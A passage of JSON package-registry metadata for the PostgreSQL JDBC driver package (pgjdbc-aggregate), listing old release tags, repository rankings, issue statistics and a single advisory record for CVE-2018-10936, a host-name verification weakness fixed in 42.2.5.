published_at":"2005-02-02T20:08:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_310","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_310","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_310","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310/manifests"},{"name":"REL8_0_309","sha":"389b1a118b97418bd72ef30e4e6534d5987faa60","kind":"commit","published_at":"2005-01-17T11:09:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_309","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_309","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_309","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309/manifests"},{"name":"REL7_4_1","sha":"2d3f36805608aa2a41d3fc85c7bc0c1e43dfb0b3","kind":"commit","published_at":"2003-12-18T04:18:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1/manifests"},{"name":"REL7_4","sha":"76a1ece07b1d3f4110d6522ce7eaf9c382316125","kind":"commit","published_at":"2003-11-15T10:20:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4/manifests"},{"name":"REL7_4_RC2","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2/manifests"},{"name":"REL7_4_RC1","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1/manifests"},{"name":"REL7_4_BETA5","sha":"8115d542320a2c6cccb5e28640991b3bd6107ad6","kind":"commit","published_at":"2003-10-15T09:39:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5/manifests"},{"name":"REL7_4_BETA4","sha":"67fffc6579b15aadb6567cdad3d7b07360f37912","kind":"commit","published_at":"2003-09-23T06:13:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4/manifests"},{"name":"REL7_4_BETA3","sha":"3f65d0b145f09a2f9ed09f53500f63efde8eb3f4","kind":"commit","published_at":"2003-09-13T04:02:16.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3/manifests"},{"name":"REL7_4_BETA2","sha":"7d4ef49d60406717eab1291c0cf6af65464e13bf","kind":"commit","published_at":"2003-08-26T06:50:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2/manifests"},{"name":"REL7_3_5","sha":"b7556b365129f5076b40e8721a0b0318d4fb5ac3","kind":"commit","published_at":"2003-08-07T17:56:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5/manifests"},{"name":"REL7_4_BETA1","sha":"ad2546260b21f17f5ad096010f1a80790108f3cd","kind":"commit","published_at":"2003-07-24T00:30:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1/manifests"},{"name":"REL7_3_4","sha":"433b7b97da262eb863e59b29161f9691a7e624c8","kind":"commit","published_at":"2003-07-23T23:34:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4/manifests"},{"name":"REL7_3_2","sha":"93d0ed7240e64ecfaaeb7e689594dc878125fd36","kind":"commit","published_at":"2003-01-14T09:40:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2/manifests"},{"name":"REL7_2_4","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4/manifests"},{"name":"REL7_2_3","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3/manifests"},{"name":"REL7_2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2/manifests"},{"name":"REL7_2_RC2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2/manifests"},{"name":"REL7_2_RC1","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1/manifests"},{"name":"REL7_2_BETA5","sha":"74b58ea9308a8d0afa06c4da53967eccbe10f955","kind":"commit","published_at":"2002-01-05T22:26:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5/manifests"},{"name":"REL7_2_BETA4","sha":"7b96aee64942e2b041820d2c8a6a95c8ac79dfdb","kind":"commit","published_at":"2001-12-11T04:48:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4/manifests"},{"name":"REL7_2_BETA3","sha":"855287de30b689e315b435f79f3b8fd066dd5ac8","kind":"commit","published_at":"2001-11-19T23:19:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3/manifests"},{"name":"REL7_2_BETA2","sha":"42c01a77e1e0be5f5b2d631fef5b3d46c2dbb7c2","kind":"commit","published_at":"2001-11-02T23:51:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2/manifests"},{"name":"REL7_2_BETA1","sha":"72a1e406d24746a658be7672b311a73bb3d815a3","kind":"commit","published_at":"2001-10-25T06:00:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1/manifests"},{"name":"REL7_1_2","sha":"78eb5549506b35d6bd13b915f34c49ec604f1f7c","kind":"commit","published_at":"2001-05-12T20:45:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2/manifests"},{"name":"REL7_1","sha":"2c56fd4ae7a9e300c5c5bba754659949874af2c2","kind":"commit","published_at":"2001-03-19T21:57:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1/manifests"},{"name":"REL7_1_BETA3","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3/manifests"},{"name":"REL7_1_BETA2","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2/manifests"},{"name":"REL7_1_BETA","sha":"422287392124727a6d1520a004d6892449c3474c","kind":"commit","published_at":"2000-11-25T04:32:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA/manifests"},{"name":"REL7_0","sha":"00659bf1e495de76b0444a0baecb12516526595d","kind":"commit","published_at":"2000-05-05T07:35:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0/manifests"},{"name":"REL6_5","sha":"a82d23e5c013587296f807ff3886359fd4941f96","kind":"commit","published_at":"1999-06-27T11:05:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL6_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL6_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL6_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5/manifests"},{"name":"release-6-3","sha":"121396c2d9ba689d98fe0837be59ce628ae62c0e","kind":"commit","published_at":"1998-02-22T18:03:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/release-6-3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/release-6-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@release-6-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3/manifests"}]},"repo_metadata_updated_at":"2026-03-15T13:13:53.923Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":4,"rankings":{"downloads":null,"dependent_repos_count":12.125259037531661,"dependent_packages_count":50.15146812962388,"stargazers_count":10.616563151972386,"forks_count":6.4499465407671694,"docker_downloads_count":null,"average":19.835809214973775},"purl":"pkg:maven/org.postgresql/pgjdbc-aggregate","advisories":[{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTU2OHEtOWZ3NS0yOHdm","url":"https://github.com/advisories/GHSA-568q-9fw5-28wf","title":"Moderate severity vulnerability that affects org.postgresql:pgjdbc-aggregate","description":"A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2018-10-19T16:53:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://nvd.nist.gov/vuln/detail/CVE-2018-10936","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10936","https://github.com/advisories/GHSA-568q-9fw5-28wf","https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E","https://www.postgresql.org/about/news/1883/","http://www.securityfocus.com/bid/105220"],"source_kind":"github","identifiers":["GHSA-568q-9fw5-28wf","CVE-2018-10936"],"repository_url":null,"blast_radius":0.0,"created_at":"2022-12-21T16:13:34.100Z","updated_at":"2026-06-18T11:12:53.059Z","epss_percentage":0.00846,"epss_percentile":0.74606,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTU2OHEtOWZ3NS0yOHdm","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTU2OHEtOWZ3NS0yOHdm","packages":[{"ecosystem":"maven","package_name":"org.postgresql:pgjdbc-aggregate","versions":[{"first_patched_version":"42.2.5","vulnerable_version_range":"\u003c 42.2.5"}],"purl":null,"statistics":{"dependent_packages_count":0,"dependent_repos_count":4,"downloads":null,"downloads_period":null},"affected_versions":["9.4.1207","9.4.1208","9.4.1209","9.4.1210","9.4.1211","9.4.1212","42.0.0","42.1.0","42.1.1","42.1.2","42.1.3","42.1.4","42.2.0","42.2.1","42.2.2","42.2.3","42.2.4"],"unaffected_versions":["42.2.5","42.2.6","42.2.7","42.2.8","42.2.9","42.2.10","42.2.11","42.2.12"]}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTU2OHEtOWZ3NS0yOHdm/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-aggregate","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.postgresql:pgjdbc-aggregate","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.postgresql:pgjdbc-aggregate/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-15T10:03:57.509Z","issues_count":355,"pull_requests_count":1106,"avg_time_to_close_issue":21320116.11678832,"avg_time_to_close_pull_request":4714478.739514349,"issues_closed_count":136,"pull_requests_closed_count":906,"pull_request_authors_count":132,"issue_authors_count":270,"avg_comments_per_issue":4.892957746478873,"avg_comments_per_pull_request":1.8824593128390597,"merged_pull_requests_count":761,"bot_issues_count":2,"bot_pull_requests_count":46,"past_year_issues_count":63,"past_year_pull_requests_count":348,"past_year_avg_time_to_close_issue":852687.9047619047,"past_year_avg_time_to_close_pull_request":365465.76,"past_year_issues_closed_count":21,"past_year_pull_requests_closed_count":275,"past_year_pull_request_authors_count":29,"past_year_issue_authors_count":53,"past_year_avg_comments_per_issue":2.3333333333333335,"past_year_avg_comments_per_pull_request":0.7097701149425287,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":3,"past_year_merged_pull_requests_count":254,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/issues","maintainers":[{"login":"davecramer","count":194,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"vlsi","count":167,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"jorsol","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"sehrope","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"ringerc","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ringerc"},{"login":"bokken","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bokken"},{"login":"praiskup","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"},{"login":"pyup-bot","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pyup-bot"}],"active_maintainers":[{"login":"vlsi","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vlsi"},{"login":"davecramer","count":46,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/davecramer"},{"login":"sehrope","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sehrope"},{"login":"jorsol","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jorsol"},{"login":"praiskup","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/praiskup"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.postgresql:pgjdbc-aggregate/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":608482,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/